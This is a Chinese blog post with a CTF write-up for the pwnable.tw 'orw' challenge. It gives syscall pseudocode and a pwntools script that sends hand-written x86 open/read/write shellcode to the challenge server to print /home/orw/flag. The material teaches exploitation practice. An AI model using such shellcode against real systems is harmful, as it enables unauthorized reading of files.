美文网首页
Pwnable.tw orw

Pwnable.tw orw

作者: Robin_Tan | 来源:发表于2017-05-31 20:37 被阅读0次

这题还是比较简单的

题目的描述看 显然是要写shellcode来读flag文件

binary会直接执行写入的shellcode

伪代码

char*file='home/orw/flag';

sys_open(file,0,0);

sys_read(3,file,0x30);

sys_write(1,file,0x30);

系统调用的参数详见这里

然后就相当于用汇编构造出这些函数,可能需要对x86汇编有一些基本的了解

利用脚本

from pwn import *

context.log_level="debug"

s = remote('chall.pwnable.tw',10001)

shellcode = ''"

shellcode += asm('xor ecx,ecx;mov eax,0x5; push ecx;push 0x67616c66; push 0x2f77726f; push 0x2f656d6f; push 0x682f2f2f; mov ebx,esp;xor edx,edx;int 0x80;')

shellcode += asm('mov eax,0x3;mov ecx,ebx;mov ebx,0x3;mov dl,0x30;int 0x80;')

shellcode += asm('mov eax,0x4;mov bl,0x1;int 0x80;')

def pwn():

    recv = s.recvuntil(':')

    print recv

    s.sendline(shellcode)

    flag = s.recv()

pwn()

相关文章

  • Pwnable.tw orw

    这题还是比较简单的 题目的描述看 显然是要写shellcode来读flag文件 binary会直接执行写入的she...

  • [pwnable.tw]-orw

    考验我们直接编写shellcode的能力,这里注意 对于32位程序,应调用int $0x80进入系统调用,将系统调...

  • orw ---- pwnable.tw

    链接见标题。 作为一个新新手,看到第一行的时候就开始感到诧异,为什么题目会给出flag的路径呢。 接下来看第二句,...

  • pwnable.tw orw wp

    题目要求:Read the flag from /home/orw/flag.Only open read wri...

  • 【pwnable.tw 系列】orw

    概述:本题是pwn的入门级题目,主要是让初学者学会编写shellcode。 1、首先file start,可以看到...

  • pwnable.tw 题解一 Start orw calc d

    0x01 Start checksec 的时候可以看到程序没有打开任何的安全保护措施,然后查看IDA下的汇编代码,...

  • house of orange总结

    例题pwnable.tw BookWriter 原理可见https://github.com/shellphish...

  • 阅读《Android Apk 编译打包流程,一文带你详细了解》

    原文地址https://mp.weixin.qq.com/s/_orW4HFDYgYSQFrT04Beog[htt...

  • 【CTF-PWN】pwnable.tw_orw

    pwnable.tw_challenge_orw 载入IDA分析: 0x01 main 这里很简单: 0x02 s...

  • [pwnable.tw]-Start

    程序很简单,直接用汇编int 80实现的读写退出,没开NX保护,然后有个栈溢出漏洞,先泄漏栈地址,然后往栈里写sh...

网友评论

      本文标题:Pwnable.tw orw

      本文链接:https://www.haomeiwen.com/subject/vyijfxtx.html